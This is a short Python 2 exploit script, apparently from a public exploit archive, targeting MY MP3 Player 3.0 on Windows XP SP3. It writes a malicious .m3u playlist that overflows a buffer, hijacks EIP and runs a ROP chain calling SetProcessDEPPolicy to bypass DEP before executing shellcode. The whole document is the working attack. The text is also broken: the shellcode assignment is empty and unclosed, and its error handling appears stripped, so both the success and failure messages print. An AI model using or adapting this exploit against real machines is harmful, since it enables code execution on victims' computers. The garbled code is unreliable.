MY MP3 Player 3.0 – ‘.m3u’ DEP Bypass

  • 作者: blake
    日期: 2011-09-17
  • 类别:
  • 来源:
  • # written to bypass OptIn/OptOut DEP policy
    # tested on windows xp sp3 running in virtualbox
    import sys
    print "\n============================"
    print "MY MP3 Player DEP Bypass"
    print " Bypass OptIn/OptOut Policy "
    print "Tested on Windows XP SP3"
    print "Written by Blake"
    print "============================\n"
    # calc.exe - 1014 bytes of space for shellcode
    shellcode =(
    buffer = "\x41" * 1024
    eip = "\x99\x13\x09\x5d"	# RETN - COMCTL32
    rop = "\x42" * 4			# junk to compensate
    rop += "\x8c\x39\x09\x5d"	# POP EBX, RETN - COMCTL32
    rop += "\xff\xff\xff\xff"
    rop += "\x28\x90\x12\x77"	# INC EBX, RETN - OLEAUT32
    rop += "\x44\x94\x12\x77"	# POP EBP, RETN - OLEAUT32
    rop += "\xa4\x22\x86\x7c"	# SetProcessDEPPolicy
    rop += "\x36\x1c\x12\x77"	# POP EDI, RETN - OLEAUT32
    rop += "\x37\x1c\x12\x77"	# RETN - OLEAUT32
    rop += "\xd4\x1a\x12\x77"	# POP ESI, RETN - OLEAUT32
    rop += "\x37\x1c\x12\x77"	# RETN - OLEAUT32
    rop += "\xf7\x8c\x14\x77"	# PUSHAD, RETN - OLEAUT32
    nops = "\x90" * 20
    junk = "\x42" * (2000 - len(nops + shellcode + rop))
    print "[+] Creating malicious .m3u file"
    file = open("exploit.m3u","w")
    file.write(buffer + eip + rop + nops + shellcode + junk)
    print "[+] File created"
    print "[x] Could not create file"
    raw_input("\nPress any key to exit...\n")